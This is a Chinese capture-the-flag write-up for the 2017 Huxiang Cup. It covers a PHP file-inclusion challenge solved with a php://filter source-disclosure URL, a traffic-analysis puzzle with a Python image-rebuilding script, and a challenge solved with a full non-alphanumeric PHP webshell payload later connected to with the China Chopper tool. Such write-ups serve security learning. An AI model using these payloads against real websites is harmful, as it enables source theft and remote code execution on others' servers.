hxb 2017 部分题解

0x00 前言

作为一名菜鸡，挤出了一点时间来做了做今年的湖湘杯，快结束的时候看了看题目，就做出了三道题，和大家分享下。

0x01 第一题 web200

拿道题目本以为是文件上传，但是试了几个方法没成功，随便点了点，看到了url中op参数，感觉是php文件包含漏洞
试了试，得到了index.php的源码

0x02 使用php://filter 读取源码

在使用php:filter协议获取源码时，需要注意”resource=index”这里不能有后缀，经过查看index源码，确实不需要后缀，后缀在源码进行了拼接。

<?php
error_reporting(0);
define('FROM_INDEX', 1);

$op = empty($_GET['op']) ? 'home' : $_GET['op'];
if(!is_string($op) || preg_match('/\.\./', $op))
    die('Try it again and I will kill you! I freaking hate hackers!');
ob_start('ob_gzhandler');

function page_top($op) {
?><!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>Panduploader::<?= htmlentities(ucfirst($op)); ?></title>
</head>
<body>
    <div id="header">
        <center><a href="?op=home" class="logo"><img src="images/logo.jpg" alt=""></a></center>
    </div>
    <div id="body">
<?php
}

function fatal($msg) {
?><div class="article">
<h2>Error</h2>
<p><?=$msg;?></p>
</div><?php
exit(1);
}

function page_bottom() {
?>
    </div>
    <center>
    <div id="footer">
        <div>
            <p>
                <span>2017 &copy; </span> All rights reserved.
            </p>
        </div>
    </div>
    </center>
</body>
</html><?php
ob_end_flush();
}

register_shutdown_function('page_bottom');

page_top($op);

if(!(include $op . '.php'))
    fatal('no such page');
?>

0x03 获取flag

url中输入flag.php ，发现有这个文件，直接读取源码，获取flag

http://114.215.129.72:10080/?op=php://filter/read=convert.base64-encode/resource=flag

0x04 第二题 MISC流量分析

查看http流发现有flag.zip

追踪TCP流将flag.zip的hex放入winhex中，保存为flag.zip

解压出一个ce.txt
打开一看，开始以为是二维码，结果做了半天也没弄出来，后来发现是RGB还原出png的图片

cat -n ce.txt | tail -n 1
98457   254, 255, 255

可以看到一共有98457行，可以生成一张887x111的图片（一般这样的图片flag为一长串，所以试了试这个规格的图片）

使用脚本生成png图片

#! /usr/bin/python2.7

from PIL import Image

x = 887
y = 111
im = Image.new('RGB',(x,y))
file = open('ce.txt')

for i in range(0,x):
    for j in range(0,y):
        line = file.readline()
        lst = line.split(',')
        im.putpixel((i,j),(int(lst[0]),int(lst[1]),int(lst[2])))

im.show()
im.save('flag.png')

0x05 第三题 web300

经过尝试，过滤了字母、数字和一些符号，需要上传一个 webshell

找到p牛的文章，提到了一种利用类型转换的 webshell。

Payload

http://114.215.133.202:10080/?content=$_=%27%27;$_[%2b$_]%2b%2b;$_=$_.%27%27;$__=$_[%2b%27%27];$_=$__;$___=$_;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$___.=$__;$___.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$___.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$___.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$___.=$__;$____=%27_%27;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$____.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$____.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$____.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$____.=$__;$_=$$____;$___($_[_]);

使用菜刀连接 密码为“_”